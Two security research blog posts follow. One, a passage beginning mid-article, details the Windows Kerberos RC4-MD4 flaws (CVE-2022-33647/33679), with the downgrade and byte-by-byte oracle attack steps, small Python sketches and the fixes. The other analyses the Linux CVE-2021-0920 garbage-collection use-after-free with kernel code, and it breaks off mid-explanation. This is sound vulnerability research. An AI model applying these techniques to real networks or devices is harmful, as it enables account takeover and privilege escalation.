As the MD4 output is 16 bytes in size it wouldn't be practical to brute force the entire key. However, the hash algorithm has no protections against brute-force attacks, for example no salting or multiple iterations. If an attacker has access to ciphertext encrypted using the RC4-HMAC key they can attempt to brute force the key by guessing the password. As users tend to choose weak or trivial passwords, this increases the chance that a brute force attack will recover the key. And with the key the attacker can then authenticate as that user to any service they like.


To get appropriate cipher text the attacker can make requests to the KDC and specify the encryption type they need. The most well known attack technique is called Kerberoasting. This technique requests a service ticket for the targeted user and specifies the RC4-HMAC encryption type as their preferred algorithm. If the user has an RC4 key configured then the ticket returned can be encrypted using the RC4-HMAC algorithm. As significant parts of the plain text are known for the ticket data, the attacker can try to brute force the key from that.


This technique does require the attacker to have an account on the KDC to make the service ticket request. It also requires that the user account has a configured Service Principal Name (SPN) so that a ticket can be requested. Also modern versions of Windows Server will try to block this attack by forcing the use of AES keys which are derived from the service user's password over RC4 even if the attacker only requested RC4 support.


An alternative form is called AS-REP Roasting. Instead of requesting a service ticket this relies on the initial authentication requests to return encrypted data. When a user sends an AS-REQ structure, the KDC can look up the user, generate the TGT and its associated session key then return that information encrypted using the user's RC4-HMAC key. At this point the KDC hasn't verified the client knows the user's key before returning the encrypted data, which allows the attacker to brute force the key without needing to have an account themselves on the KDC.


Fortunately this attack is more rare because Windows's Kerberos implementation requires pre-authentication. For a password based logon the user uses their encryption key to encrypt a timestamp value which is sent to the KDC as part of the AS-REQ. The KDC can decrypt the timestamp, check it's within a small time window and only then return the user's TGT and encrypted session key. This would prevent an attacker getting encrypted data for the brute force attack. 


However, Windows does support a user account flag, "Do not require Kerberos preauthentication". If this flag is enabled on a user the authentication request does not require the encrypted timestamp to be sent and the AS-REP roasting process can continue. This should be an uncommon configuration.


The success of the brute-force attack entirely depends on the password complexity. Typically service user accounts have a long, at least 25 character, randomly generated password which is all but impossible to brute force. Normal users would typically have weaker passwords, but they are less likely to have a configured SPN which would make them targets for Kerberoasting. The system administrator can also mitigate the attack by disabling RC4 entirely across the network, though this is not commonly done for compatibility reasons. A more limited alternative is to add sensitive users to the Protected Users Group, which disables RC4 for them without having to disable it across the entire network.

Windows Kerberos Encryption Implementation

While researching Windows Defender Credential Guard (CG) I wanted to understand how Windows actually implements the various Kerberos encryption schemes. The primary goal of CG, at least for Kerberos, is to protect the user's keys, specifically the ones derived from their password and the session keys for the TGT. If I could find a way of using one of the keys with a weak encryption algorithm, I hoped to be able to extract the original key, removing CG's protection.


The encryption algorithms are all implemented inside the CRYPTDLL.DLL library which is separate from the core Kerberos library in KERBEROS.DLL on the client and KDCSVC.DLL on the server. This interface is undocumented but it's fairly easy to work out how to call the exported functions. For example, to get a "crypto system" from the encryption type integer you can use the following exported function:


NTSTATUS CDLocateCSystem(int etype, KERB_ECRYPT** engine);
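
As a rough illustration, the export can be called from Python with ctypes (Windows only, and treating KERB_ECRYPT as an opaque pointer since the structure is undocumented); the -128 encryption type is the RC4-MD4 system discussed below:

import ctypes

cryptdll = ctypes.WinDLL('CRYPTDLL.DLL')
engine = ctypes.c_void_p()
# NTSTATUS CDLocateCSystem(int etype, KERB_ECRYPT** engine);
status = cryptdll.CDLocateCSystem(-128, ctypes.byref(engine))
print(hex(status & 0xffffffff), hex(engine.value or 0))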


The KERB_ECRYPT structure contains configuration information for the engine such as the size of the key and function pointers to convert a password to a key, generate new session keys, and perform encryption or decryption. The structure also contains a textual name so that you can get a quick idea of what the algorithm is supposed to be, which led to the following list of supported systems:


Name                                    Encryption Type

----                                    ---------------

RSADSI RC4-HMAC                         24

RSADSI RC4-HMAC                         23

Kerberos AES256-CTS-HMAC-SHA1-96        18

Kerberos AES128-CTS-HMAC-SHA1-96        17

Kerberos DES-CBC-MD5                    3

Kerberos DES-CBC-CRC                    1

RSADSI RC4-MD4                          -128

Kerberos DES-Plain                      -132

RSADSI RC4-HMAC                         -133

RSADSI RC4                              -134

RSADSI RC4-HMAC                         -135

RSADSI RC4-EXP                          -136

RSADSI RC4                              -140

RSADSI RC4-EXP                          -141

Kerberos AES128-CTS-HMAC-SHA1-96-PLAIN  -148

Kerberos AES256-CTS-HMAC-SHA1-96-PLAIN  -149


Encryption types with positive values are well-known encryption types defined in the RFCs, whereas negative values are private types. Therefore I decided to spend my time on these private types. Most of the private types were just subtle variations on the existing well-known types, or clones with legacy numbers. 


However, one stood out as being different from the rest, "RSADSI RC4-MD4" with type value -128. This was different because the implementation was incredibly insecure, specifically it had the following properties:


  • Keys are 16 bytes in size, but only the first 8 of the key bytes are used by the encryption algorithm.

  • The key is used as-is, there's no blinding so the key stream is always the same for the same user key.

  • The message type is ignored, which means that the key stream is the same for different parts of the Kerberos protocol when using the same key.

  • The encrypted data does not contain any cryptographic hash to protect from tampering with the ciphertext which for RC4 is basically catastrophic. Even though the name contains MD4 this is only used for deriving the key from the password, not for any message integrity.

  • Generated session keys are 16 bytes in size but only contain 40 bits (5 bytes) of randomness. The remaining 11 bytes are populated with the fixed value of 0xAB.
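
A sketch of that last point: an RC4-MD4 session key has the right length on the wire but only 40 bits of entropy, something like the following (a hypothetical reconstruction of the described behavior, not the actual Windows code):

import os

def rc4_md4_session_key() -> bytes:
    # 16 bytes, but only 5 random bytes; the rest is the fixed pad byte
    # 0xAB, leaving a 2^40 search space for an attacker.
    return os.urandom(5) + b'\xAB' * 11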


To say this is bad from a cryptographic standpoint is an understatement. Surely it would be safe to assume that while this crypto system is implemented in CRYPTDLL, it wouldn't actually be used by Kerberos? Unfortunately not: it is accepted as a valid encryption type when sent in the AS-REQ to the KDC. The question then becomes how to exploit this behavior.

Exploitation on the Wire (CVE-2022-33647)

My first thoughts were to attack the session key generation. If we could get the server to return the AS-REP with a RC4-MD4 session key for the TGT then any subsequent usage of that key could be captured and used to brute force the 40 bit key. At that point we could take the user's TGT which is sent in the clear and the session key and make requests as that authenticated user.


The most obvious approach to forcing the preferred encryption type to be RC4-MD4 would be to interpose the connection between a client and the KDC. The etype field of the AS-REQ is not protected for password based authentication. Therefore a proxy can modify the field to only include RC4-MD4 which is then sent to the KDC. Once that's completed the proxy would need to also capture a service ticket request to get encrypted data to brute force.


Brute forcing the 40 bit key would be technically feasible, at least if you built a giant lookup table, but it didn't feel practical. I realized there's a simpler way: when a client authenticates, it typically sends a request to the KDC with no pre-authentication timestamp present. As long as pre-authentication hasn't been disabled the KDC returns a Kerberos error to the client with the KDC_ERR_PREAUTH_REQUIRED error code.


As part of that error response the KDC also sends a list of acceptable encryption types in the PA-ETYPE-INFO2 pre-authentication data structure. This list contains additional information for the password to key derivation such as the salt for AES keys. The client can use this information to correctly generate the encryption key for the user. I noticed that if you sent back only a single entry indicating support for RC4-MD4 then the client would use the insecure algorithm for generating the pre-authentication timestamp. This worked even if the client didn't request RC4-MD4 in the first place.


When the KDC received the timestamp it would validate it using the RC4-MD4 algorithm and return the AS-REP with the TGT's RC4-MD4 session key encrypted using the same key as the timestamp. Due to the already mentioned weaknesses in the RC4-MD4 algorithm the key stream used for the timestamp must be the same as used in the response to encrypt the session key. Therefore we could mount a known-plaintext attack to recover the keystream from the timestamp and use that to decrypt parts of the response.


Diagram showing the attack process. A computer with a kerberos client sends an AS-REQ to the attacker, which returns an error requesting pre-authentication and selecting RC4-MD4 encryption. The client then converts the user's password into an RC4-MD4 key which is used to encrypt the timestamp to send to the KDC. This is used to validate the user authentication and an AS-REP is returned with a TGT session key generated for RC4-MD4.
The timestamp itself has the following ASN.1 structure, which is serialized using the Distinguished Encoding Rules (DER) and then encrypted.


PA-ENC-TS-ENC           ::= SEQUENCE {

     patimestamp     [0] KerberosTime -- client's time --,

     pausec          [1] Microseconds OPTIONAL

}


The AS-REP encrypted response has the following ASN.1 structure:


EncASRepPart  ::= SEQUENCE {

     key             [0] EncryptionKey,

     last-req        [1] LastReq,

     nonce           [2] UInt32,

     key-expiration  [3] KerberosTime OPTIONAL,

     flags           [4] TicketFlags,

     authtime        [5] KerberosTime,

     starttime       [6] KerberosTime OPTIONAL,

     endtime         [7] KerberosTime,

     renew-till      [8] KerberosTime OPTIONAL,

     srealm          [9] Realm,

     sname           [10] PrincipalName,

     caddr           [11] HostAddresses OPTIONAL

}


We can see from the two structures that as luck would have it the session key in the AS-REP is at the start of the encrypted data. This means there should be an overlap between the known parts of the timestamp and the key, allowing us to apply key stream recovery to decrypt the session key without any brute force needed.


Diagram showing ASN.1 DER structures for the timestamp and encrypted AS-REP part. It shows there is an overlap between known bytes in the timestamp with the 40 bit session key in the AS-REP.

The diagram shows the ASN.1 DER structures for the timestamp and the start of the AS-REP. The values with specific hex digits in green are plain-text we know or can calculate as they are part of the ASN.1 structure such as types and lengths. We can see that there's a clear overlap between 4 bytes of known data in the timestamp with the first 4 bytes of the session key. We only need the first 5 bytes of the key due to the padding at the end, but this does mean we need to brute force the final key byte. 
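
As a sketch, and assuming (as the lack of key blinding implies) that both ciphertexts consume the keystream from the same starting offset:

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def recover_overlap(ts_ct: bytes, ts_known_pt: bytes, asrep_ct: bytes) -> bytes:
    # The same RC4-MD4 keystream encrypts both messages, so known timestamp
    # plaintext reveals keystream bytes, which in turn decrypt the AS-REP.
    keystream = xor(ts_ct, ts_known_pt)   # truncated to the known bytes
    return xor(asrep_ct, keystream)       # decrypted AS-REP prefix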


We can do this brute force in one of two ways. First we can send service ticket requests with the user's TGT and a guess for the session key to the KDC until one succeeds. This would require at most 256 requests to the KDC. Alternatively we can capture a service ticket request from the client, which is likely to happen immediately after the authentication. As the service ticket request will be encrypted using the session key, we can perform the brute force attack locally without needing to talk to the KDC, which will be faster. Regardless of the option chosen, this approach would be orders of magnitude faster than brute forcing the entire 40 bit session key.


The simplest approach to performing this exploit would be to interpose the client to server connection and modify traffic. However, as the initial request without pre-authentication just returns an error message it's likely the exploit could be done by injecting a response back to the client while the KDC is processing the real request. This could be done with only the ability to monitor network traffic and inject arbitrary network traffic back into that network. However, I've not verified that approach.

Exploitation without Interception (CVE-2022-33679)

The requirement to have access to the client to server authentication traffic does make this vulnerability seem less impactful, although there are plenty of scenarios where an attacker could interpose, such as shared wifi networks, or physical attacks which could compromise the computer account authentication that takes place when a domain joined system is booted.


It would be interesting if there was an attack vector to exploit this without needing a real Kerberos user at all. I realized that if a user has pre-authentication disabled then we have everything we need to perform the attack. The important point is that if pre-authentication is disabled we can request a TGT for the user, specifying RC4-MD4 encryption and the KDC will send back the AS-REP encrypted using that algorithm.


The key to the exploit is to reverse the previous attack, instead of using the timestamp to decrypt the AS-REP we'll use the AS-REP to encrypt a timestamp. We can then use the timestamp value when sent to the KDC as an encryption oracle to brute force enough bytes of the key stream to decrypt the TGT's session key. For example, if we remove the optional microseconds component of the timestamp we get the following DER encoded values:


Diagram showing ASN.1 DER structures for the timestamp and encrypted AS-REP part. It shows there is an overlap between known bytes in the AS-REP and the timestamp string which can be used to generate a valid encrypted timestamp.

The diagram shows that currently there's no overlap between the timestamp, represented by the T bytes, and the 40 bit session key. However, we know or at least can calculate the entire DER encoded data for the AS-REP to cover the entire timestamp buffer. We can use this to calculate the keystream for the user's RC4-MD4 key without actually knowing the key itself. With the key stream we can encrypt a valid timestamp and send it to the KDC. 


If the KDC responds with a valid AS-REP then we know we've correctly calculated the key stream. How can we use this to start decrypting the session key? The KerberosTime value used for the timestamp is an ASCII string of the form YYYYMMDDHHmmssZ. The KDC parses this string to a format suitable for processing by the server. The parser takes the time as a NUL terminated string, so we can add an additional NUL character to the end of the string and it shouldn't affect the parsing. Therefore we can change the timestamp to the following:



Diagram showing ASN.1 DER structures for the timestamp and encrypted AS-REP part. It shows there is an overlap between a final NUL character at the end of the timestamp string which overlaps with the first byte of the 40 bit session key.

We can now guess a value for the encrypted NUL character and send the new timestamp to the KDC. If the KDC returns an error we know that the parsing failed as it didn't decrypt to a NUL character. However, if the authentication succeeds the value we guessed is the next byte in the key stream and we can decrypt the first byte of the session key.
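
In pseudo-Python the oracle loop looks like this, where send_asreq is a stand-in (not a real API) for submitting an AS-REQ containing the given encrypted timestamp and reporting whether the KDC accepted it:

def recover_keystream_byte(known_ct: bytes, send_asreq) -> int:
    # Extend the ciphertext by one guessed byte; the KDC only accepts the
    # request if that byte decrypts to the trailing NUL, so an accepted
    # guess equals the next keystream byte (guess XOR 0x00).
    for guess in range(256):
        if send_asreq(known_ct + bytes([guess])):
            return guess
    raise RuntimeError('no guess accepted; oracle assumption violated')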


At this point we've got a problem: we can't just add another NUL character as the parser would stop on the first one we sent. Even if the value didn't decrypt to a NUL it wouldn't be possible to detect. This is when a second trick comes into play: instead of extending the string we can abuse the way value lengths are encoded in DER. A length can be in one of two forms: a short form if the length is less than 128, or a long form for everything else.


For the short form the length is encoded in a single byte. For the long form, the first byte has the top bit set to 1, and the lower 7 bits encode the number of trailing bytes of the length value in big-endian format. For example in the above diagram the timestamp's total size is 0x14 bytes which is stored in the short form. We can instead encode the length in an arbitrary sized long form, for example 0x81 0x14, 0x82 0x00 0x14, 0x83 0x00 0x00 0x14 etc. The examples shown below move the NUL character to brute force the next two bytes of the session key:



Diagram showing ASN.1 DER structures for the timestamp and encrypted AS-REP part. It shows extending the first length field so there is an overlap between a final NUL character at the end of the timestamp string which overlaps with the second and third bytes of the 40 bit session key.

Even though technically DER requires the shortest form necessary to encode the length, the Microsoft ASN.1 library doesn't enforce that when parsing, so we can just repeat this length encoding trick to cover the remaining 4 unknown bytes of the key. As the exploit brute forces one byte at a time, the maximum number of requests that we'd need to send to the KDC is 5 × 2^8, which is 1280 requests, as opposed to 2^40 requests, which would be around 1 trillion.
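
The length widening itself is simple to express; a short sketch of the non-minimal DER long form described above:

def der_length_long(n: int, width: int) -> bytes:
    # Long form: 0x80 | number-of-length-bytes, then the length big-endian.
    # DER requires the minimal width, but the Microsoft parser doesn't check.
    return bytes([0x80 | width]) + n.to_bytes(width, 'big')

assert der_length_long(0x14, 1) == b'\x81\x14'
assert der_length_long(0x14, 2) == b'\x82\x00\x14'
assert der_length_long(0x14, 3) == b'\x83\x00\x00\x14'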


Even with such a small number of requests it can still take around 30 seconds to brute force the key, but that still makes it a practical attack. It would be very noisy on the network, and you'd expect any competent EDR system to notice, although by then it might be too late.

The Fixes

The only fix I can find is in the KDC service for the domain controller. Microsoft has added a new flag which by default disables the RC4-MD4 algorithm and an old variant of RC4-HMAC with the encryption type of -133. This behavior can be re-enabled by setting the KDC configuration registry value AllowOldNt4Crypto. The reference to NT4 is a good indication of how long this vulnerability has existed, as it presumably pre-dates the introduction of Kerberos in Windows 2000. There are probably some changes to the client as well, but I couldn't immediately find them and it's not really worth my time to reverse engineer it.


It'd be good to mitigate the risk of similar attacks before they're found. Disabling RC4 is definitely recommended; however, that can bring its own problems. If this particular vulnerability were being exploited in the wild it should be pretty easy to detect: unusual Kerberos encryption types would be an immediate red flag, as would the repeated login attempts.


Another option is to enforce Kerberos Armoring (FAST) on all clients and KDCs in the environment. This would make it more difficult to inspect and tamper with Kerberos authentication traffic. However it's not a panacea, for example for FAST to work the domain joined computer needs to first authenticate without FAST to get a key they can then use for protecting the communications. If that initial authentication is compromised the entire protection fails.


The quantum state of Linux kernel garbage collection CVE-2021-0920 (Part I)

10 August 2022 at 23:00

A deep dive into an in-the-wild Android exploit

Guest Post by Xingyu Jin, Android Security Research

This is part one of a two-part guest blog post, where first we'll look at the root cause of the CVE-2021-0920 vulnerability. In the second post, we'll dive into the in-the-wild 0-day exploitation of the vulnerability and post-compromise modules.

Overview of in-the-wild CVE-2021-0920 exploits

A surveillance vendor named Wintego developed an exploit for a Linux socket syscall 0-day, CVE-2021-0920, and used it in the wild since at least November 2020 (based on the earliest captured sample) until the issue was fixed in November 2021. Combined with Chrome and Samsung browser exploits, the vendor was able to remotely root Samsung devices. The fix was released with the November 2021 Android Security Bulletin, and applied to Samsung devices in Samsung's December 2021 security update.

Google's Threat Analysis Group (TAG) discovered Samsung browser exploit chains being used in the wild. TAG then performed root cause analysis and discovered that this vulnerability, CVE-2021-0920, was being used to escape the sandbox and elevate privileges. CVE-2021-0920 was reported to Linux/Android anonymously. The Google Android Security Team performed the full deep-dive analysis of the exploit.

This issue was initially discovered in 2016 by a RedHat kernel developer and disclosed in a public email thread, but the Linux kernel community did not patch the issue until it was re-reported in 2021.

Various Samsung devices were targeted, including the Samsung S10 and S20. By abusing an ephemeral race condition in Linux kernel garbage collection, the exploit code was able to obtain a use-after-free (UAF) in a kernel sk_buff object. The in-the-wild sample could effectively circumvent CONFIG_ARM64_UAO, achieve arbitrary read / write primitives and bypass Samsung RKP to elevate to root. Other Android devices were also vulnerable, but we did not find any exploit samples against them.

Text extracted from captured samples dubbed the vulnerability “quantum Linux kernel garbage collection”, which appears to be a fitting title for this blogpost.

Introduction

CVE-2021-0920 is a use-after-free (UAF) due to a race condition in the garbage collection system for SCM_RIGHTS. SCM_RIGHTS is a control message that allows unix-domain sockets to transmit an open file descriptor from one process to another. In other words, the sender transmits a file descriptor and the receiver then obtains a file descriptor from the sender. This passing of file descriptors adds complexity to reference-counting file structs. To account for this, the Linux kernel community designed a special garbage collection system. CVE-2021-0920 is a vulnerability within this garbage collection system. By winning a race condition during the garbage collection process, an adversary can exploit the UAF on the socket buffer, sk_buff object. In the following sections, we’ll explain the SCM_RIGHTS garbage collection system and the details of the vulnerability. The analysis is based on the Linux 4.14 kernel.

What is SCM_RIGHTS?

Linux developers can share file descriptors (fd) from one process to another using the SCM_RIGHTS datagram with the sendmsg syscall. When a process passes a file descriptor to another process, SCM_RIGHTS will add a reference to the underlying file struct. This means that the process that is sending the file descriptors can immediately close the file descriptor on their end, even if the receiving process has not yet accepted and taken ownership of the file descriptors. When the file descriptors are in the “queued” state (meaning the sender has passed the fd and then closed it, but the receiver has not yet accepted the fd and taken ownership), specialized garbage collection is needed to track this “queued” state. This LWN article does a great job explaining SCM_RIGHTS reference counting, and it's recommended reading before continuing on with this blogpost.
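
Before diving into the kernel side, here's what SCM_RIGHTS looks like from user space; a minimal Python sketch that passes a file descriptor across a socketpair:

import array, os, socket

a, b = socket.socketpair(socket.AF_UNIX, socket.SOCK_STREAM)
fd = os.open('/dev/null', os.O_RDONLY)

# Send one byte of normal data plus an SCM_RIGHTS control message
# carrying the file descriptor.
a.sendmsg([b'x'], [(socket.SOL_SOCKET, socket.SCM_RIGHTS,
                    array.array('i', [fd]).tobytes())])

# The receiver gets a *new* descriptor referring to the same file struct.
msg, ancdata, flags, addr = b.recvmsg(1, socket.CMSG_SPACE(4))
level, ctype, data = ancdata[0]
print('received fd:', array.array('i', data[:4])[0])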

Sending

As stated previously, a unix domain socket uses the syscall sendmsg to send a file descriptor to another socket. To explain the reference counting that occurs during SCM_RIGHTS, we’ll start from the sender’s point of view. We start with the kernel function unix_stream_sendmsg, which implements the sendmsg syscall. To implement the SCM_RIGHTS functionality, the kernel uses the structure scm_fp_list for managing all the transmitted file structures. scm_fp_list stores the list of file pointers to be passed.

struct scm_fp_list {

        short                   count;

        short                   max;

        struct user_struct      *user;

        struct file             *fp[SCM_MAX_FD];

};

unix_stream_sendmsg invokes scm_send (af_unix.c#L1886) to initialize the scm_fp_list structure, linked by the scm_cookie structure on the stack.

struct scm_cookie {

        struct pid              *pid;           /* Skb credentials */

        struct scm_fp_list      *fp;            /* Passed files         */

        struct scm_creds        creds;          /* Skb credentials      */

#ifdef CONFIG_SECURITY_NETWORK

        u32                     secid;          /* Passed security ID   */

#endif

};

To be more specific, scm_send → __scm_send → scm_fp_copy (scm.c#L68) reads the file descriptors from the userspace and initializes scm_cookie->fp which can contain SCM_MAX_FD file structures.

Since the Linux kernel uses the sk_buff (also known as socket buffers or skb) object to manage all types of socket datagrams, the kernel also needs to invoke the unix_scm_to_skb function to link the scm_cookie->fp to a corresponding skb object. This occurs in unix_attach_fds (scm.c#L103):

/*

 * Need to duplicate file references for the sake of garbage

 * collection.  Otherwise a socket in the fps might become a

 * candidate for GC while the skb is not yet queued.

 */

UNIXCB(skb).fp = scm_fp_dup(scm->fp);

if (!UNIXCB(skb).fp)

        return -ENOMEM;

The scm_fp_dup call in unix_attach_fds increases the reference count of the file descriptor that’s being passed so the file is still valid even after the sender closes the transmitted file descriptor later:

struct scm_fp_list *scm_fp_dup(struct scm_fp_list *fpl)

{

        struct scm_fp_list *new_fpl;

        int i;

        if (!fpl)

                return NULL;

        new_fpl = kmemdup(fpl, offsetof(struct scm_fp_list, fp[fpl->count]),

                          GFP_KERNEL);

        if (new_fpl) {

                for (i = 0; i < fpl->count; i++)

                        get_file(fpl->fp[i]);

                new_fpl->max = new_fpl->count;

                new_fpl->user = get_uid(fpl->user);

        }

        return new_fpl;

}

Let’s examine a concrete example. Assume we have sockets A and B. Socket A attempts to pass itself to B. After the SCM_RIGHTS datagram is sent, the newly allocated skb from the sender will be appended to B’s sk_receive_queue, which stores received datagrams:

unix_stream_sendmsg creates an sk_buff which contains the scm_fp_list structure. The scm_fp_list has an fp pointer that points to the transmitted file (A). The sk_buff is appended to the receiver's queue and the reference count of A is 2.

sk_buff carries scm_fp_list structure

The reference count of A is incremented to 2 and the reference count of B is still 1.

Receiving

Now, let’s take a look at the receiver side unix_stream_read_generic (we will not discuss the MSG_PEEK flag yet, and focus on the normal routine). First of all, the kernel grabs the current skb from sk_receive_queue using skb_peek. Secondly, since scm_fp_list is attached to the skb, the kernel will call unix_detach_fds (link) to parse the transmitted file structures from skb and clear the skb from sk_receive_queue:

/* Mark read part of skb as used */

if (!(flags & MSG_PEEK)) {

        UNIXCB(skb).consumed += chunk;

        sk_peek_offset_bwd(sk, chunk);

        if (UNIXCB(skb).fp)

                unix_detach_fds(&scm, skb);

        if (unix_skb_len(skb))

                break;

        skb_unlink(skb, &sk->sk_receive_queue);

        consume_skb(skb);

        if (scm.fp)

                break;

The function scm_detach_fds iterates over the list of passed file descriptors (scm->fp) and installs the new file descriptors accordingly for the receiver:

for (i=0, cmfptr=(__force int __user *)CMSG_DATA(cm); i<fdmax;

     i++, cmfptr++)

{

        struct socket *sock;

        int new_fd;

        err = security_file_receive(fp[i]);

        if (err)

                break;

        err = get_unused_fd_flags(MSG_CMSG_CLOEXEC & msg->msg_flags

                                  ? O_CLOEXEC : 0);

        if (err < 0)

                break;

        new_fd = err;

        err = put_user(new_fd, cmfptr);

        if (err) {

                put_unused_fd(new_fd);

                break;

        }

        /* Bump the usage count and install the file. */

        sock = sock_from_file(fp[i], &err);

        if (sock) {

                sock_update_netprioidx(&sock->sk->sk_cgrp_data);

                sock_update_classid(&sock->sk->sk_cgrp_data);

        }

        fd_install(new_fd, get_file(fp[i]));

}

/*

 * All of the files that fit in the message have had their

 * usage counts incremented, so we just free the list.

 */

__scm_destroy(scm);

Once the file descriptors have been installed, __scm_destroy (link) cleans up the allocated scm->fp and decrements the file reference count for every transmitted file structure:

void __scm_destroy(struct scm_cookie *scm)

{

        struct scm_fp_list *fpl = scm->fp;

        int i;

        if (fpl) {

                scm->fp = NULL;

                for (i=fpl->count-1; i>=0; i--)

                        fput(fpl->fp[i]);

                free_uid(fpl->user);

                kfree(fpl);

        }

}

Reference Counting and Inflight Counting

As mentioned above, when a file descriptor is passed using SCM_RIGHTS, its reference count is immediately incremented. Once the recipient socket has accepted and installed the passed file descriptor, the reference count is then decremented. The complication comes from the “middle” of this operation: after the file descriptor has been sent, but before the receiver has accepted and installed the file descriptor.

Let’s consider the following scenario:

  1. The process creates sockets A and B.
  2. A sends socket A to socket B.
  3. B sends socket B to socket A.
  4. Close A.
  5. Close B.

Socket A and B form a reference count cycle.

Scenario for reference count cycle

Both sockets are closed prior to accepting the passed file descriptors. The reference counts of A and B are both 1 and can't be further decremented because they were removed from the kernel fd table when the respective processes closed them. Therefore the kernel is unable to release the two skbs and sock structures, and an unbreakable cycle is formed. The Linux kernel garbage collection system is designed to prevent memory exhaustion in this particular scenario. The inflight count was implemented to identify potential garbage: each time the reference count is increased due to an SCM_RIGHTS datagram being sent, the inflight count will also be incremented.
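
The scenario above can be reproduced from user space in a few lines; a minimal sketch, where each send_fd call queues the sender's file struct on the peer's receive queue:

import array, socket

def send_fd(sock, fd):
    sock.sendmsg([b'x'], [(socket.SOL_SOCKET, socket.SCM_RIGHTS,
                           array.array('i', [fd]).tobytes())])

a, b = socket.socketpair(socket.AF_UNIX, socket.SOCK_STREAM)
send_fd(a, a.fileno())   # A's file struct now sits in B's receive queue
send_fd(b, b.fileno())   # B's file struct now sits in A's receive queue
a.close()                # drops the fd table references...
b.close()                # ...leaving only the queued, cyclic references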

When a file descriptor is sent by SCM_RIGHTS datagram, the Linux kernel puts its unix_sock into a global list gc_inflight_list. The kernel increments unix_tot_inflight which counts the total number of inflight sockets. Then, the kernel increments u->inflight which tracks the inflight count for each individual file descriptor in the unix_inflight function (scm.c#L45) invoked from unix_attach_fds:

void unix_inflight(struct user_struct *user, struct file *fp)

{

        struct sock *s = unix_get_socket(fp);

        spin_lock(&unix_gc_lock);

        if (s) {

                struct unix_sock *u = unix_sk(s);

                if (atomic_long_inc_return(&u->inflight) == 1) {

                        BUG_ON(!list_empty(&u->link));

                        list_add_tail(&u->link, &gc_inflight_list);

                } else {

                        BUG_ON(list_empty(&u->link));

                }

                unix_tot_inflight++;

        }

        user->unix_inflight++;

        spin_unlock(&unix_gc_lock);

}

Thus, here is what the sk_buff looks like when transferring a file descriptor within sockets A and B:

When the file descriptor A sends itself to the file descriptor B, the reference count of the file descriptor A is 2 and the inflight count is 1. For the receiver file descriptor B, the file reference count is 1 and the inflight count is 0.

The inflight count of A is incremented

When the socket file descriptor is received from the other side, the unix_sock.inflight count will be decremented.

Let’s revisit the reference count cycle scenario before the close syscall. This cycle is breakable because either socket can still receive the transmitted file and break the reference cycle:

The file descriptor A sends itself to the file descriptor B and vice versa. The inflight count of the file descriptor A and B is both 1 and the file reference count is both 2.

Breakable cycle before close A and B

After closing both of the file descriptors, the reference count equals the inflight count for each of the socket file descriptors, which is a sign of possible garbage:

The cycle becomes unbreakable after closing A and B. The reference count equals to the inflight count for A and B.

Unbreakable cycle after close A and B

Now, let’s check another example. Assume we have sockets A, B and 𝛼:

  1. A sends socket A to socket B.
  2. B sends socket B to socket A.
  3. B sends socket B to socket 𝛼.
  4. 𝛼 sends socket 𝛼 to socket B.
  5. Close A.
  6. Close B.

A, B and alpha form a breakable cycle.

Breakable cycle for A, B and 𝛼

The cycle is breakable, because we can get a newly installed file descriptor B' from the socket file descriptor 𝛼 and a newly installed file descriptor A' from B'.

Garbage Collection

A high level view of garbage collection is available from lwn.net:

"If, instead, the two counts are equal, that file structure might be part of an unreachable cycle. To determine whether that is the case, the kernel finds the set of all in-flight Unix-domain sockets for which all references are contained in SCM_RIGHTS datagrams (for which f_count and inflight are equal, in other words). It then counts how many references to each of those sockets come from SCM_RIGHTS datagrams attached to sockets in this set. Any socket that has references coming from outside the set is reachable and can be removed from the set. If it is reachable, and if there are any SCM_RIGHTS datagrams waiting to be consumed attached to it, the files contained within that datagram are also reachable and can be removed from the set.

At the end of an iterative process, the kernel may find itself with a set of in-flight Unix-domain sockets that are only referenced by unconsumed (and unconsumable) SCM_RIGHTS datagrams; at this point, it has a cycle of file structures holding the only references to each other. Removing those datagrams from the queue, releasing the references they hold, and discarding them will break the cycle."

To be more specific, the SCM_RIGHTS garbage collection system was developed in order to handle the unbreakable reference cycles. To identify which file descriptors are a part of unbreakable cycles:

  1. Add any unix_sock objects whose reference count equals its inflight count to the gc_candidates list.
  2. Determine if the socket is referenced by any sockets outside of the gc_candidates list. If it is then it is reachable, remove it and any sockets it references from the gc_candidates list. Repeat until no more reachable sockets are found.
  3. After this iterative process, only sockets that are solely referenced by other sockets within the gc_candidates list are left.
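
As a toy model of this refinement (pure Python over a socket graph, not kernel code), the fixed point can be computed like this:

def find_garbage(ref, queued):
    # ref[s]: total reference count of socket s.
    # queued[s]: sockets referenced by SCM_RIGHTS datagrams sitting
    # unconsumed in s's receive queue.
    inflight = {s: sum(q.count(s) for q in queued.values()) for s in ref}
    candidates = {s for s in ref if ref[s] == inflight[s] and inflight[s]}
    changed = True
    while changed:
        changed = False
        for s in list(candidates):
            held_by_candidates = sum(queued[t].count(s) for t in candidates)
            if inflight[s] > held_by_candidates:
                candidates.discard(s)   # referenced from outside: reachable
                changed = True
    return candidates                   # only unreachable cycles remain

# The unbreakable A/B cycle from earlier: both sockets are garbage.
print(find_garbage({'A': 1, 'B': 1}, {'A': ['B'], 'B': ['A']}))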

Let’s take a closer look at how this garbage collection process works. First, the kernel finds all the unix_sock objects whose reference counts equals their inflight count and puts them into the gc_candidates list (garbage.c#L242):

list_for_each_entry_safe(u, next, &gc_inflight_list, link) {

        long total_refs;

        long inflight_refs;

        total_refs = file_count(u->sk.sk_socket->file);

        inflight_refs = atomic_long_read(&u->inflight);

        BUG_ON(inflight_refs < 1);

        BUG_ON(total_refs < inflight_refs);

        if (total_refs == inflight_refs) {

                list_move_tail(&u->link, &gc_candidates);

                __set_bit(UNIX_GC_CANDIDATE, &u->gc_flags);

                __set_bit(UNIX_GC_MAYBE_CYCLE, &u->gc_flags);

        }

}

Next, the kernel removes any sockets that are referenced by other sockets outside of the current gc_candidates list. To do this, the kernel invokes scan_children (garbage.c#L138) along with the function pointer dec_inflight to iterate through each candidate’s sk->receive_queue. It decreases the inflight count for each of the passed file descriptors that are themselves candidates for garbage collection (garbage.c#L261):

/* Now remove all internal in-flight reference to children of

 * the candidates.

 */

list_for_each_entry(u, &gc_candidates, link)

        scan_children(&u->sk, dec_inflight, NULL);

After iterating through all the candidates, if a gc candidate still has a positive inflight count it means that it is referenced by objects outside of the gc_candidates list and therefore is reachable. These candidates should not be included in the gc_candidates list so the related inflight counts need to be restored.

